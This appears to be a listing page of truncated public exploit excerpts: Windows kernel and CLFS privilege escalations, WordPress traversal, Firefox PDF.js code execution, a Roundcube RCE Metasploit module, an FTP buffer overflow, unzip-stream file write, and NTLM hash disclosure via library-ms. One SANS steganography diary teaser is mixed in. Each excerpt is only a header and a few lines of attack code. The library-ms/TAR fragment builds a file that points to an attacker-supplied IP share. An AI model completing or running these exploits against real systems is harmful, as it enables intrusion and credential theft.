Microsoft Windows 11 – Kernel Privilege Escalation

# Exploit Title: Microsoft Windows 11 – Kernel Privilege Escalation # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Tested on: Win, Ubuntu # CVE : CVE-2024-21338 #include "pch.hpp" #include "poc.hpp" // This function is used to set the IOCTL buffer depending on the…

WordPress Core 6.2 – Directory Traversal

# Exploit Title: WordPress Core 6.2 – Directory Traversal # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Version: = 6.2 # Tested on: Win, Ubuntu # CVE : CVE-2023-2745 import requests from colorama import init, Fore, Style init(autoreset=True) url = input("E.G https://example.com/wp-login.php : ") …

More Steganography! – SANS Internet Storm Center

I spotted another interesting file that uses, once again, steganography. It seems to be a trend (see one of my previous diaries[1]). The file is a malicious Excel sheet called blcopy.xls. Office documents are rare these days because Microsoft tightened the rules that allow automatic macro execution[2]. But it does not mean that Office documents…

Firefox ESR 115.11 – PDF.js Arbitrary JavaScript execution

# Exploit Title: Firefox ESR 115.11 – Arbitrary JavaScript execution in PDF.js # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://wordpress.org # Version: = 115.11 # Tested on: Win, Ubuntu # CVE : CVE-2024-4367 #!/usr/bin/env python3 import sys def…

Windows File Explorer Windows 10 Pro x64 – TAR Extraction

import os import tarfile def main(): file_name = input("Enter your file name: ") ip_address = input("Enter IP (EX: 192.168.1.162): ") library_content = f""" \\\\{ip_address}\\IT """ library_file_name = f"{file_name}.library-ms" with open(library_file_name, "w", encoding="utf-8") as f: f.write(library_content) tar_name = "exploit.tar" with tarfile.open(tar_name, "w") as tarf: …

Roundcube 1.6.10 – Remote Code Execution (RCE)

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Roundcube <= 1.6.10 Post-Auth RCE via PHP Object Deserialization', 'Description' => %q{ Roundcube Webmail before 1.5.10…

Freefloat FTP Server 1.0 – Remote Buffer Overflow

# Exploit Title: Freefloat FTP Server 1.0 – Remote Buffer Overflow # Date: 22 May 2025 # Notification vendor: Not reported # Discovery by: Fernando Mengali # LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/ # Version: 1.0 # Tested on: Windows XP SP3 English – # Version 5.1 (Build 2600.xpsp.080413-2111 : Service Pack 3) # Vulnerability Type: Remote Buffer Overflow …

Microsoft Windows 11 23h2 – CLFS.sys Elevation of Privilege

# Exploit Title: Microsoft Windows 11 23h2 – CLFS.sys Elevation of Privilege # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # CVE: CVE-2024-49138 #include #include #include #include #include #include #include #include #include #include…

unzip-stream 0.3.1 – Arbitrary File Write

# Exploit Title: unzip-stream 0.3.1 – Arbitrary File Write # Date: 18th April, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Software link: https://github.com/mhr3/unzip-stream # Version: unzip-stream 0.3.1 # Tested on: Ubuntu # CVE: CVE-2024-42471 # NB: Python's built-in `zipfile` module has limitations on the `arcname` parameter. # To bypass…

Microsoft – NTLM Hash Disclosure Spoofing (library-ms)

# Exploit title: Microsoft – NTLM Hash Disclosure Spoofing (library-ms) # Exploit Author: John Page (aka hyp3rlinx) # x.com/hyp3rlinx # ISR: ApparitionSec Back in 2018, I reported a “.library-ms” File NTLM information disclosure vulnerability to MSRC and was told “it was not severe enough”, that being said I post it anyways. Seven years passed,…